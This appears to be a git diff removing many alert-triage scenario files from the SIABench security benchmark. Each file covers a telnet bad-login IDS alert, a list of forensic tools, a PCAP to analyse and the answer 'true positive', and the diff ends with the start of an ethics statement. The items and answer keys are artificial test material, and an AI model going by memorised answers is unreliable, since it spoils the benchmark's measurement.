-{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21658", - "alert_type": "True", - "alert_name": "dp_21658" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:53.983848+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43556", - "alert": "1970-01-02T00:12:53.983848+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43556", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21660.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21660.json deleted file mode 100644 index 8c163f39ac56a412065e3d6741084a126b41cb8d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21660.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21660", - "alert_type": "True", - "alert_name": "dp_21660" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:56.521154+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43586", - "alert": "1970-01-02T00:12:56.521154+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43586", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21661.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21661.json deleted file mode 100644 index 261aa4227a52b8aad045ce50ef994b02faab40e0..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21661.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21661", - "alert_type": "True", - "alert_name": "dp_21661" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:59.361734+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56602", - "alert": "1970-01-02T00:12:59.361734+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56602", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21662.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21662.json deleted file mode 100644 index 926460736e05f972759e61830ed7b78453ebb4d4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21662.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21662", - "alert_type": "True", - "alert_name": "dp_21662" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:59.859739+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56606", - "alert": "1970-01-02T00:12:59.859739+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56606", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21664.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21664.json deleted file mode 100644 index db18fb7cc34ebcd903932d88dcaf06c2264dd2b7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21664.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21664", - "alert_type": "True", - "alert_name": "dp_21664" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:05.516840+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56612", - "alert": "1970-01-02T00:13:05.516840+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56612", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21665.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21665.json deleted file mode 100644 index 563c95ebc63814994c336ea7f297a238295633ae..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21665.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21665", - "alert_type": "True", - "alert_name": "dp_21665" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:05.533848+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56624", - "alert": "1970-01-02T00:13:05.533848+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56624", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21666.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21666.json deleted file mode 100644 index f904b562d3af1c7dee54c5db18c74266e12728c8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21666.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21666", - "alert_type": "True", - "alert_name": "dp_21666" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:08.368158+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49410", - "alert": "1970-01-02T00:13:08.368158+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49410", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21670.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21670.json deleted file mode 100644 index 7132b7f077af38d070a082adeab2f5ea594e0ac0..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21670.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21670", - "alert_type": "True", - "alert_name": "dp_21670" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:11.316835+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49434", - "alert": "1970-01-02T00:13:11.316835+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49434", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21672.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21672.json deleted file mode 100644 index 8fd37c709c63ab5d2b1a9673888059c85b5e2165..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21672.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21672", - "alert_type": "True", - "alert_name": "dp_21672" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:14.133760+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49446", - "alert": "1970-01-02T00:13:14.133760+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49446", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21675.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21675.json deleted file mode 100644 index 20575201fd3e86fefc955b02ff940d85380ca7a2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21675.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21675", - "alert_type": "True", - "alert_name": "dp_21675" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:20.546693+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:46796", - "alert": "1970-01-02T00:13:20.546693+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:46796", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21681.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21681.json deleted file mode 100644 index 2d65feffbb3f8d29b27b42a52c05d05c930584b7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21681.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21681", - "alert_type": "True", - "alert_name": "dp_21681" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:29.179704+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36764", - "alert": "1970-01-02T00:13:29.179704+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36764", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21683.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21683.json deleted file mode 100644 index bdd3cb7a4b615ab2f6e86b7565f7f0bb238997ba..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21683.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21683", - "alert_type": "True", - "alert_name": "dp_21683" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:35.575361+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36796", - "alert": "1970-01-02T00:13:35.575361+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36796", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21685.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21685.json deleted file mode 100644 index 60e3afb2c934d7f6dea477bc1f2d030248a916f7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21685.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21685", - "alert_type": "True", - "alert_name": "dp_21685" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:36.714284+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36816", - "alert": "1970-01-02T00:13:36.714284+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36816", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21687.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21687.json deleted file mode 100644 index b10c3da23e2ee19e4e3172e71e916161820fef80..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21687.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21687", - "alert_type": "True", - "alert_name": "dp_21687" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:39.070188+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51048", - "alert": "1970-01-02T00:13:39.070188+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51048", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21691.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21691.json deleted file mode 100644 index 24e592c61582a619c001cc61b87a3857a00b2b92..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21691.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21691", - "alert_type": "True", - "alert_name": "dp_21691" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:44.449955+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51066", - "alert": "1970-01-02T00:13:44.449955+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51066", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21693.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21693.json deleted file mode 100644 index c3e8a1db10cbbd97e1b89eda2e38cad53b583092..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21693.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21693", - "alert_type": "True", - "alert_name": "dp_21693" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:49.892971+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43210", - "alert": "1970-01-02T00:13:49.892971+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43210", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21695.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21695.json deleted file mode 100644 index f3a36a3f678a20498e2f612347dd48d55f4ed339..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21695.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21695", - "alert_type": "True", - "alert_name": "dp_21695" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60394", - "alert": "1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60394", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21696.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21696.json deleted file mode 100644 index a330ca943d0340d647f078ae1012d0be40205d33..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21696.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21696", - "alert_type": "True", - "alert_name": "dp_21696" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43236", - "alert": "1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43236", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21699.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21699.json deleted file mode 100644 index 614ad6916c7d524e429af5cbc4938947f6ef7186..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21699.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21699", - "alert_type": "True", - "alert_name": "dp_21699" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43270", - "alert": "1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43270", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/ETHICS.md b/SIABench-main/ETHICS.md deleted file mode 100644 index 6328c0c98f65232f89c41b4f305c63e12f6e435f..0000000000000000000000000000000000000000 --- a/SIABench-main/ETHICS.md +++ /dev/null @@ -1,27 +0,0 @@ -# Ethics Statement - -We decided to publish our SIA benchmark dataset, autonomous evaluation agent, and results publicly. Specifically, we first discuss our compliance with the terms and conditions (T&C) of the platforms from which we curated our data. Second, we identify both positive and negative outcomes that may arise from making the work publicly available, the risk mitigation steps taken, and how we weighed the benefits against the negative outcomes to arrive at this decision. - -## Data Curation and Compliance - -Our SIA dataset has been developed by carefully curating security incident-related challenges from three blue team platforms: [BlueTeamLabsOnline](https://blueteamlabs.online/), [CyberDefenders](https://cyberdefenders.org/), and [TryHackMe](https://tryhackme.com/). Before data curation, we carefully reviewed their T&C and complied with them by taking several steps, as detailed below. Additionally, we reviewed prior leading works, such as [PentestGPT](https://www.usenix.org/conference/usenixsecurity24/presentation/deng) and [InterCode-CTF](https://openreview.net/forum?id=KOZwk7BFc3), who curated data from similar platforms as ours, and tailored their best practices to our released SIA dataset. PentestGPT and InterCode-CTF used challenges from [HackTheBox](https://www.hackthebox.com/) and [PicoCTF](https://picoctf.org/), which abide by similar T&C as ours. PentestGPT used multiple active labs from HackTheBox in their benchmark dataset and provided the names of the labs, allowing users instantiate the labs and run experiments. Since PentestGPT used active labs, all of them require login and some of them require paid subscriptions as well. The InterCode-CTF data file (.json) contains the CTF challenges (query and answer) and corresponding source URL referring to the original platform, and in some cases the URLs of the write-ups where they curated the solutions from. - -Our problem set takes a similar approach. We provide the SIA challenges within our framework (e.g., scenario, questions, answers), but do not host files/artifacts directly and instead provide source URLs to access or download the files/artifacts from. Accessing the files/artifacts from the source platforms may require login, similar to the challenges from [HackTheBox](https://www.hackthebox.com/) and [PicoCTF](https://picoctf.org/), but do not require any subscription or payment. All SIA problems in our dataset are either retired or free; have legit and multiple open-source [write-ups](https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main) (under AGPL 3.0 license or open-source blogs) containing the scenario, questions, solving strategy, and answers. We provide URLs to all publicly available write-ups for our problem sets so users can verify the solutions. All these steps will facilitate the reproduction of the results without violating the T&C of the platforms. That said, some files/artifacts involved may contain potentially harmful content. We strongly recommend executing the code and downloading artifacts only within isolated environments, such as a Kali Linux virtual machine, to ensure system safety. - -For our Alert Triaging dataset, we developed it using publicly available files (PCAPs) from the 